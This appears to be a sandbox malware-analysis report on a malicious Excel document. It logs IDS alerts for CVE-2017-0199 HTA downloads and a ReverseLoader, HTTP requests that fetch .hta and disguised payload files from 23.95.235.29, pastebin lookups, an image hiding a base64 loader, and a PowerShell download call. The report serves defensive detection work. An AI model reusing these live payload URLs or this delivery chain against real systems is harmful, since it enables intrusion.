Source: global traffic	TCP traffic: 151.101.1.137:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 151.101.1.137:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 151.101.1.137:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 151.101.1.137:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 151.101.1.137:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 151.101.1.137:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 151.101.1.137:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 54.150.207.131:443
Source: global traffic	TCP traffic: 54.150.207.131:443 -> 192.168.2.22:49170
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 54.150.207.131:443
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 54.150.207.131:443
Source: global traffic	TCP traffic: 54.150.207.131:443 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 54.150.207.131:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 54.150.207.131:443
Source: global traffic	TCP traffic: 54.150.207.131:443 -> 192.168.2.22:49170
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 54.150.207.131:443
Source: global traffic	TCP traffic: 54.150.207.131:443 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 151.101.1.137:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 151.101.1.137:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 151.101.1.137:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 151.101.1.137:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 151.101.1.137:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 151.101.1.137:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 151.101.1.137:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 151.101.1.137:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 151.101.1.137:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 151.101.1.137:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 151.101.1.137:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 151.101.1.137:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 151.101.1.137:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 151.101.1.137:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 151.101.1.137:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 151.101.1.137:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 151.101.1.137:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 151.101.1.137:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 151.101.1.137:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 151.101.1.137:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 151.101.1.137:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 151.101.1.137:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 151.101.1.137:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 151.101.1.137:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 151.101.1.137:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 151.101.1.137:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 151.101.1.137:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 151.101.1.137:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 151.101.1.137:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 151.101.1.137:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 151.101.1.137:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 151.101.1.137:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 151.101.1.137:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 151.101.1.137:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 151.101.1.137:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 151.101.1.137:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 151.101.1.137:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 151.101.1.137:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 151.101.1.137:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 151.101.1.137:443 -> 192.168.2.22:49168

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2858795 - Severity 1 - ETPRO MALWARE ReverseLoader Payload Request (GET) M2 : 192.168.2.22:49165 -> 23.95.235.29:80
Source: Network traffic	Suricata IDS: 2024197 - Severity 1 - ET EXPLOIT MSXMLHTTP Download of HTA (Observed in CVE-2017-0199) : 23.95.235.29:80 -> 192.168.2.22:49162
Source: Network traffic	Suricata IDS: 2024197 - Severity 1 - ET EXPLOIT MSXMLHTTP Download of HTA (Observed in CVE-2017-0199) : 23.95.235.29:80 -> 192.168.2.22:49164
Source: Network traffic	Suricata IDS: 2049038 - Severity 1 - ET MALWARE ReverseLoader Reverse Base64 Loader In Image M2 : 151.101.1.137:443 -> 192.168.2.22:49168
Source: Network traffic	Suricata IDS: 2049038 - Severity 1 - ET MALWARE ReverseLoader Reverse Base64 Loader In Image M2 : 151.101.1.137:443 -> 192.168.2.22:49174

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\System32\wscript.exe	Network Connect: 45.63.94.214 443
Source: C:\Windows\System32\wscript.exe	Domain query: paste.rs

Connects to a pastebin service (likely for C&C)

Source: unknown	DNS query: name: paste.ee
Source: unknown	DNS query: name: paste.ee
Source: unknown	DNS query: name: paste.ee
Source: unknown	DNS query: name: paste.ee
Source: unknown	DNS query: name: paste.ee
Source: unknown	DNS query: name: paste.ee
Source: unknown	DNS query: name: paste.ee
Source: unknown	DNS query: name: paste.ee
Source: unknown	DNS query: name: paste.ee
Source: unknown	DNS query: name: paste.ee

Source: global traffic	HTTP traffic detected: GET /dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpg HTTP/1.1Host: res.cloudinary.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpg HTTP/1.1Host: res.cloudinary.comConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 23.95.235.29 23.95.235.29
Source: Joe Sandbox View	IP Address: 151.101.1.137 151.101.1.137
Source: Joe Sandbox View	IP Address: 54.150.207.131 54.150.207.131

Source: Joe Sandbox View	ASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
Source: Joe Sandbox View	ASN Name: AS-CHOOPAUS AS-CHOOPAUS

Source: Joe Sandbox View	JA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
Source: Joe Sandbox View	JA3 fingerprint: 7dcce5b76c8b17472d024758970a406b

Source: Network traffic	Suricata IDS: 2024449 - Severity 1 - ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl : 192.168.2.22:49164 -> 23.95.235.29:80
Source: Network traffic	Suricata IDS: 2024449 - Severity 1 - ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl : 192.168.2.22:49162 -> 23.95.235.29:80
Source: Network traffic	Suricata IDS: 2024449 - Severity 1 - ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl : 192.168.2.22:49172 -> 23.95.235.29:80

Source: global traffic	HTTP traffic detected: GET /wAvDWQ?&leg=fortunate&district=coherent&vibraphone=symptomatic&ronald=fine&kielbasa HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: short.ruksk.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wAvDWQ?&leg=fortunate&district=coherent&vibraphone=symptomatic&ronald=fine&kielbasa HTTP/1.1Accept: /Accept-Language: fr-FRUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: short.ruksk.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /ACRWC HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: paste.rsConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wAvDWQ?&leg=fortunate&district=coherent&vibraphone=symptomatic&ronald=fine&kielbasa HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: short.ruksk.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wAvDWQ?&leg=fortunate&district=coherent&vibraphone=symptomatic&ronald=fine&kielbasa HTTP/1.1Accept: /Accept-Language: fr-FRUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: short.ruksk.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /ACRWC HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: paste.rsConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /808/kcc/nicewithgreatfeaturesreturnformebestthingsgivensoofar.hta HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 23.95.235.29Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /808/kcc/nicewithgreatfeaturesreturnformebestthingsgivensoofar.hta HTTP/1.1Accept: /Accept-Language: fr-FRUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Range: bytes=8897-Connection: Keep-AliveHost: 23.95.235.29If-Range: "14551-628f814321468"
Source: global traffic	HTTP traffic detected: GET /808/verynicecreamychickenfvouratedishesforeveryonewhoinonlinewith.tIF HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 23.95.235.29Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /808/kcc/nicewithgreatfeaturesreturnformebestthingsgivensoofar.hta HTTP/1.1Accept: /Accept-Language: fr-FRUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)If-Modified-Since: Wed, 11 Dec 2024 05:43:36 GMTConnection: Keep-AliveHost: 23.95.235.29If-None-Match: "14551-628f814321468"

Source: unknown	HTTPS traffic detected: 151.101.1.137:443 -> 192.168.2.22:49168 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 151.101.1.137:443 -> 192.168.2.22:49174 version: TLS 1.0

Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.235.29
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.235.29
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.235.29
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.235.29
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.235.29
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.235.29
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.235.29
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.235.29
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.235.29
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.235.29
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.235.29
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.235.29
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.235.29
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.235.29
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.235.29
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.235.29
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.235.29
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.235.29
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.235.29
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.235.29
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.235.29
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.235.29
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.235.29
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.235.29
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.235.29
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.235.29
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.235.29
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.235.29
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.235.29
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.235.29
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.235.29
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.235.29
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.235.29
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.235.29
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.235.29
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.235.29
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.235.29
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.235.29
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.235.29
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.235.29
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.235.29
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.235.29
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.235.29
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.235.29
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.235.29
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.235.29
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.235.29
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.235.29
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.235.29
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.235.29

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Code function: 8_2_000007FE899A7018 URLDownloadToFileW,

8_2_000007FE899A7018

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\325DEE15.emf

Jump to behavior

Source: global traffic	HTTP traffic detected: GET /wAvDWQ?&leg=fortunate&district=coherent&vibraphone=symptomatic&ronald=fine&kielbasa HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: short.ruksk.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wAvDWQ?&leg=fortunate&district=coherent&vibraphone=symptomatic&ronald=fine&kielbasa HTTP/1.1Accept: /Accept-Language: fr-FRUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: short.ruksk.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /ACRWC HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: paste.rsConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wAvDWQ?&leg=fortunate&district=coherent&vibraphone=symptomatic&ronald=fine&kielbasa HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: short.ruksk.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpg HTTP/1.1Host: res.cloudinary.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wAvDWQ?&leg=fortunate&district=coherent&vibraphone=symptomatic&ronald=fine&kielbasa HTTP/1.1Accept: /Accept-Language: fr-FRUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: short.ruksk.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /ACRWC HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: paste.rsConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpg HTTP/1.1Host: res.cloudinary.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /808/kcc/nicewithgreatfeaturesreturnformebestthingsgivensoofar.hta HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 23.95.235.29Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /808/kcc/nicewithgreatfeaturesreturnformebestthingsgivensoofar.hta HTTP/1.1Accept: /Accept-Language: fr-FRUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Range: bytes=8897-Connection: Keep-AliveHost: 23.95.235.29If-Range: "14551-628f814321468"
Source: global traffic	HTTP traffic detected: GET /808/verynicecreamychickenfvouratedishesforeveryonewhoinonlinewith.tIF HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 23.95.235.29Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /808/kcc/nicewithgreatfeaturesreturnformebestthingsgivensoofar.hta HTTP/1.1Accept: /Accept-Language: fr-FRUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)If-Modified-Since: Wed, 11 Dec 2024 05:43:36 GMTConnection: Keep-AliveHost: 23.95.235.29If-None-Match: "14551-628f814321468"

Source: mshta.exe, 00000004.00000003.435929278.0000000003C40000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.438878715.0000000003C40000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.435038294.0000000003C3D000.00000004.00000020.00020000.00000000.sdmp

String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)

Source: global traffic	DNS traffic detected: DNS query: short.ruksk.com
Source: global traffic	DNS traffic detected: DNS query: paste.rs
Source: global traffic	DNS traffic detected: DNS query: res.cloudinary.com
Source: global traffic	DNS traffic detected: DNS query: paste.ee

Source: mshta.exe, 00000004.00000003.435929278.0000000003C83000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.438878715.0000000003C83000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.439322100.0000000003C83000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.435038294.0000000003C83000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000002.492452916.0000000004964000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.491728979.0000000004964000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.483554413.0000000004964000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://23.95.235.29/
Source: mshta.exe, 00000012.00000003.491675537.0000000003CED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.485770112.0000000003DAB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://23.95.235.29/808/kcc/nicewithgreatfeaturesreturnformebestthingsgivensoofar.hta
Source: mshta.exe, 00000004.00000003.436007400.00000000004BC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.439131832.000000000046E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.439131832.00000000004BD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.434003137.00000000004BD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000002.492043428.000000000037B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000002.492043428.000000000034E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://23.95.235.29/808/kcc/nicewithgreatfeaturesreturnformebestthingsgivensoofar.hta&ronald=fine&ki
Source: mshta.exe, 00000012.00000002.492043428.00000000003B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://23.95.235.29/808/kcc/nicewithgreatfeaturesreturnformebestthingsgivensoofar.hta...asa
Source: mshta.exe, 00000004.00000003.434003137.00000000004D9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://23.95.235.29/808/kcc/nicewithgreatfeaturesreturnformebestthingsgivensoofar.hta...basa/
Source: mshta.exe, 00000004.00000003.434003137.00000000004D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000002.492043428.00000000003B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://23.95.235.29/808/kcc/nicewithgreatfeaturesreturnformebestthingsgivensoofar.hta...elbasa
Source: mshta.exe, 00000004.00000003.434003137.00000000004D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.436007400.00000000004D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.439131832.00000000004D9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://23.95.235.29/808/kcc/nicewithgreatfeaturesreturnformebestthingsgivensoofar.hta2
Source: mshta.exe, 00000004.00000003.434003137.00000000004D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.436007400.00000000004D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.439131832.00000000004D9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://23.95.235.29/808/kcc/nicewithgreatfeaturesreturnformebestthingsgivensoofar.hta6)-Q
Source: mshta.exe, 00000012.00000003.491244632.0000000003DAB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000002.492375272.0000000003DAB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.485770112.0000000003DAB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://23.95.235.29/808/kcc/nicewithgreatfeaturesreturnformebestthingsgivensoofar.htaC:
Source: mshta.exe, 00000012.00000002.492043428.00000000003B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://23.95.235.29/808/kcc/nicewithgreatfeaturesreturnformebestthingsgivensoofar.htaHC:
Source: mshta.exe, 00000012.00000002.492270253.0000000003CED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.491675537.0000000003CED000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://23.95.235.29/808/kcc/nicewithgreatfeaturesreturnformebestthingsgivensoofar.htaNetwkY4K
Source: mshta.exe, 00000004.00000003.436100458.0000000002E65000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.490780364.0000000003115000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.485500603.0000000003115000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://23.95.235.29/808/kcc/nicewithgreatfeaturesreturnformebestthingsgivensoofar.htahttp://23.95.23
